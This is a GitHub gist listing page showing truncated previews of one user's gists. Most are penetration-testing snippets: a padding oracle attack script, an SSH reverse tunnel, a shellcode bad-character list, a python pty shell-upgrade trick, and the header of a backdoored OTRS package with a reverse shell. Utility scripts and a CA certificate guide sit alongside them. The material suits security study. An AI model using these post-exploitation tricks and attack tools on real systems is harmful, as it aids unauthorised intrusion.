Kevin Kirsche kkirsche

@kkirsche
kkirsche / Dockerfile
Last active March 15, 2017 17:03
recon-ng docker
FROM python:2.7
MAINTAINER Kevin Kirsche
RUN apt-get update && apt-get -y dist-upgrade && apt-get -y install git
RUN git clone https://[email protected]/LaNMaSteR53/recon-ng.git && cd recon-ng && pip install -U pip && pip install -r REQUIREMENTS
ENTRYPOINT ["/bin/bash"]
kkirsche / python-convert-dictionary-to-object
Created June 20, 2017 21:59 — forked from typerandom/python-convert-dictionary-to-object
Convert a dictionary to an object (recursive).
class DictionaryUtility:
    """
    Utility methods for dealing with dictionaries.
    """
    @staticmethod
    def to_object(item):
        """
        Convert a dictionary to an object (recursive).
        """
        def convert(item):
kkirsche / longest_file_in_dir.sh
Created June 26, 2017 17:30
Longest File in directory
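#!/bin/bash
# Print the line count of every regular file under the current directory,
# sorted ascending so the longest file is listed last.
# NUL-delimited names and quoting keep paths with spaces or globs intact.
find . -print0 | while IFS= read -r -d '' file
do
    if [ -f "$file" ]; then
        wc -l "$file"
    fi
done | sort -n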
kkirsche / add CA cert on CentOS.md
Created August 2, 2017 20:00 — forked from kekru/add CA cert on CentOS Debian Ubuntu.md
Add CA cert to local trust store on CentOS or Debian
  • Open a webpage that uses the CA with Firefox
  • Click the lock icon in the address bar -> show information -> show certificate
  • The certificate viewer will open
  • Click Details and choose the certificate in the certificate chain that you want to import to CentOS
  • Click "Export..." and save it as a .crt file
  • Copy the .crt file to /etc/pki/ca-trust/source/anchors on your CentOS machine
  • Run update-ca-trust extract
  • Test it with wget https://thewebsite.org
kkirsche / magic.py
Last active May 20, 2020 13:43
Padding Oracle
# -*- coding: utf-8 -*-
from paddingoracle import BadPaddingException, PaddingOracle
from base64 import b64encode, b64decode
from urllib import quote, unquote
import requests
import socket
import time
class PadBuster(PaddingOracle):
kkirsche / go-ssh-reverse-tunnel.go
Created October 25, 2017 13:12 — forked from codref/go-ssh-reverse-tunnel.go
Go SSH reverse tunnel implementation (SSH -R)
/*
Go-Language implementation of an SSH Reverse Tunnel, the equivalent of below SSH command:
ssh -R 8080:127.0.0.1:8080 operatore@146.148.22.123
which opens a tunnel between the two endpoints and permits exchanging information in this direction:
server:8080 -----> client:8080
kkirsche / base64-to-hex.py
Created October 25, 2017 14:22
Decode base64 and convert to hex format, like shellcode
#!/usr/bin/env python
from base64 import b64decode
from urllib import unquote
base64_strs = ['xU5LNJhXeo9B6o4Ri%2FxFHodARXWqgtNufNrYzqG05nGOLNboDgJtkw%3D%3D',
               '%2BjAd73J7RAZgLxAUkIG5l0cMPLQEBAtZRMP3WdXr1%2BMYdrg2cZKaow%3D%3D']
for bstr in base64_strs:
    unquoted_bstr = unquote(bstr)
kkirsche / bad_char_find.py
Last active March 19, 2019 13:12
bad_char_find.py
# We want to make this re-usable if we need it in the future, so let's remove
# the characters only when found, but always keep the full list around
bad_char_list = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
kkirsche / tricks
Created November 10, 2017 14:58 — forked from sckalath/tricks
tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
kkirsche / MyPackage.opm
Created November 15, 2017 13:11 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>